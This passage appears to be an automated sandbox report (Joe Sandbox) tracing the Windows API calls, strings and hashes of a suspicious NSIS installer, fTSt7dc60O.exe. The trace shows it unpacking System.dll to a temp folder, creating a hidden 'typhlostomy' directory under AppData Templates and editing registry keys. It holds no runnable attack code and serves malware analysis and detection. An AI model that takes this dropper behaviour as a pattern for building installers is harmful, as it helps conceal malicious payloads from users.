                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fTSt7dc60O.exe,00000400), ref: 00402DEC
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00402E35
                                                      • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                      • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                        • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                        • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                      • WriteFile.KERNELBASE(0040BE90,00410DE9,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                      • SetFilePointer.KERNELBASE(00004D7A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID: A
                                                      • API String ID: 2146148272-1346673623

                                                      APIs
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405A4C
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,00000000,000000F0), ref: 00401630
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00401623
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                      • API String ID: 3751793516-3275360645

                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0

                                                      APIs
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                      • String ID:
                                                      • API String ID: 1791698881-3916222277

                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                      • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3677997916-1824292864
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user~1\AppData\Local\Temp\), ref: 00405C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-3083371207
                                                      APIs
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00403347
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 4115351271-3049706366
                                                      • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                      • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                      • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                      • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                      • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID:
                                                      • API String ID: 539440098-0
                                                      • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                      • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                      • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                      • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 334405425-0
                                                      • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                      • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                      • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                      • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                      APIs
                                                        • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                      • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                      • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                      • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                      • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                      • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                      • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                      APIs
                                                        • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValue
                                                      • String ID:
                                                      • API String ID: 849931509-0
                                                      • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                      • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                      • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                      • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                      • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                      • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                      • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                      • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                      • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FilePointerwsprintf
                                                      • String ID:
                                                      • API String ID: 327478801-0
                                                      • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                      • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                      • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                      • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
                                                      • API String ID: 390214022-0
                                                      • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                      • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                      • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                      • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                      • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                      • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                      • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                      APIs
